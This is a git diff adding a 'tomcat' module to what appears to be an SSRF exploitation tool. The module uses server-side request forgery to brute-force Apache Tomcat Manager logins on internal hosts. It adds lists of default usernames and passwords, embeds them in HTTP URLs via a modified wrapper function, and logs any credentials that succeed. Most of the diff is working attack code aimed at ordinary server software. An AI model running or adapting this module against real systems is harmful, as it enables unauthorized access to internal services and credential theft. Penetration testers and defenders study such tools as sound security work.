diff --git a/README.md b/README.md
index a883938..e7c5ca8 100644
--- a/README.md
+++ b/README.md
@@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
 | `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
 | `socksproxy`   | SOCKS4 Proxy |
 | `smbhash`      | Force an SMB authentication via a UNC Path |
+| `tomcat`       | Bruteforce attack against Tomcat Manager |
 
 ## Contribute
 
diff --git a/core/utils.py b/core/utils.py
index eacc9ae..6673397 100644
--- a/core/utils.py
+++ b/core/utils.py
@@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
 def wrapper_dict(data, ip, port):
     return "dict://{}:{}/{}".format(ip, port, data)
 
-def wrapper_http(data, ip, port):
+def wrapper_http(data, ip, port, usernm=False, passwd=False):
+    if usernm != False and passwd != False:
+        return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
     return "http://{}:{}/{}".format(ip, port, data)
 
 def wrapper_https(data, ip, port):
diff --git a/modules/tomcat.py b/modules/tomcat.py
new file mode 100644
index 0000000..7b18cb3
--- /dev/null
+++ b/modules/tomcat.py
@@ -0,0 +1,31 @@
+from core.utils import *
+import logging
+
+name          = "tomcat"
+description   = "Tomcat - Bruteforce manager"
+author        = "Swissky"
+documentation = [
+    "https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html", 
+    "https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
+    ]
+
+class exploit():
+    SERVER_HOST   = "127.0.0.1"
+    SERVER_PORT   = "8888"
+    SERVER_TOMCAT = "manager/html"
+    tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
+    tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # Using a generator to create the host list
+        gen_host = gen_ip_list(self.SERVER_HOST, args.level)
+        for ip in gen_host:
+            for usr in self.tomcat_user:
+                for pss in self.tomcat_pass:
+                    payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
+                    r = requester.do_request(args.param, payload)
+
+                    if not "s3cret" in r.text:
+                        logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
\ No newline at end of file
diff --git a/screenshot/tomcat_example_ssrf.png b/screenshot/tomcat_example_ssrf.png
new file mode 100644
index 0000000..f2f32ab
Binary files /dev/null and b/screenshot/tomcat_example_ssrf.png differ